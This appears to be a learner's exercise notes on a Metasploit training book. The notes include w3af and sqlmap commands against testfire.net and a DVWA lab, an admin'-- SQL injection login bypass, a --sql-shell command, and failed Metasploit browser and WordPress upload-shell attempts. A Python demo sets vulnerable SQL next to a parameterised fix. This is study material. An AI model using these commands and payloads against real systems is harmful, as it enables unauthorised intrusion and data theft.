p163 XSSF
Kali 2.0 does not ship with XSSF by default, so download it first: https://code.google.com/archive/p/xssf/downloads
Unzip the downloaded zip file, merge the data, plugins, lab and other folders into the corresponding folders under /usr/share/metasploit-framework/, then load XSSF in msfconsole.
I followed the book, but the final attack did not succeed!
... ['exploit:windows/browser/ie_createobject']
[*] Exploit execution started, press [CTRL + C] to stop it!
[+] Remaining victims to attack: [[1] (1)]   (it stays stuck here)
^C
[-] Exploit interrupted by the console user
p180 Practice
1. Probing for SQL injection vulnerabilities on www.testfire.net:
# w3af_console
w3af>>> plugins
w3af/plugins>>> audit sqli
w3af/plugins>>> crawl web_spider
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set verbose True
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start
It successfully found 8 URLs and several different injection points.
Scan with sqlmap:
sqlmap -u "http://www.testfire.net/bank/login.aspx" --data "Uid=admin&passw=a&btnsubmit=login"
sqlmap detected some information about the backend database.
It is easy to log in at http://www.testfire.net/bank/login.aspx by entering admin'-- as the username.
But how do you get further information out of the database? I haven't finished this part yet.
2. This can be done as on p163 of the book.
3. WXF: https://github.com/forced-request/wxf
After downloading, unzip it, change into the unzipped directory and run ./console; it fails with:
/usr/lib/ruby/2.2.0/rubygems/core_ext/kernel_require.rb:si:in `require': cannot load such file -- iconv (LoadError)
Because I'm not familiar with Ruby and didn't understand the fixes posted online either, I skipped this one.
4. I chose this vulnerability to test: https://www.exploit-db.com/exploits/37182/
However, the test result was:
I don't know whether this is an issue with the server software version on the target.
5. I don't know how to do this one. Skipping it for now.
6. Successfully obtained a SQL shell with the following command:
sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#' --cookie='security=low; PHPSESSID=7918OEOATNUR63RQ8BOKN88SD2' --sql-shell
7. p177
I followed the prompts step by step, but without success:
[*] Started reverse TCP handler on 10.10.10.128:4444
[*] Successfully uploaded shell.
[*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<head><title>413 Request Entity Too Large</title></head><body>
The requested resource<br />/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br />does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.</body>...
[*] Exploit completed, but no session was created.
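The admin'-- login bypass noted in exercise 1 above works because the login page builds its SQL query by string concatenation: the single quote closes the username literal and -- turns the rest of the statement, including the password check, into a comment. The Python script below is an added example written for this page, not code from the book or from the original post. It uses a constructed in-memory SQLite table with assumed column names (uid and passw, chosen to match the form field names, not the real testfire.net schema) and shows the vulnerable query next to a parameterised version fed the same input. The -- comment syntax behaves the same way in SQLite as in the SQL Server backend behind testfire.

```python
import sqlite3

# Constructed sample data for this example (not the testfire.net database).
SAMPLE_USERS = [("admin", "S3cretAdm1n"), ("jsmith", "demo1234")]


def make_db():
    """Create an in-memory SQLite users table holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT PRIMARY KEY, passw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_query(uid, passw):
    """The query a string-concatenating login page effectively sends.

    Column names are assumed for this example; the pattern is what matters.
    """
    return ("SELECT uid FROM users WHERE uid = '" + uid
            + "' AND passw = '" + passw + "'")


def login_vulnerable(conn, uid, passw):
    """Vulnerable login: user input is spliced into the SQL text.

    With uid = "admin'--" the statement becomes
        SELECT uid FROM users WHERE uid = 'admin'--' AND passw = '...'
    and everything after -- is a comment, so the password is never checked.
    """
    row = conn.execute(build_vulnerable_query(uid, passw)).fetchone()
    return row[0] if row else None


def login_safe(conn, uid, passw):
    """Hardened login: the same query with bound parameters.

    The driver sends the input as a value, so "admin'--" is compared as a
    literal username and cannot change the statement's structure.
    """
    row = conn.execute(
        "SELECT uid FROM users WHERE uid = ? AND passw = ?", (uid, passw)
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the bypass against both versions and return the outcomes."""
    conn = make_db()
    payload_uid, any_passw = "admin'--", "a"   # the input used on testfire
    return {
        "query_sent": build_vulnerable_query(payload_uid, any_passw),
        "vulnerable_result": login_vulnerable(conn, payload_uid, any_passw),
        "safe_result": login_safe(conn, payload_uid, any_passw),
        "safe_correct_creds": login_safe(conn, "admin", "S3cretAdm1n"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the vulnerable version returning admin for the payload while the parameterised version returns nothing for it and still accepts the real credentials. The --sql-shell used in exercise 6 is the same weakness exploited from the other direction: once input reaches the query text unescaped, sqlmap can inject whatever SQL it wants rather than just short-circuiting a WHERE clause.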
"Metasploit Devil Training Camp", chapter 4 (part 2)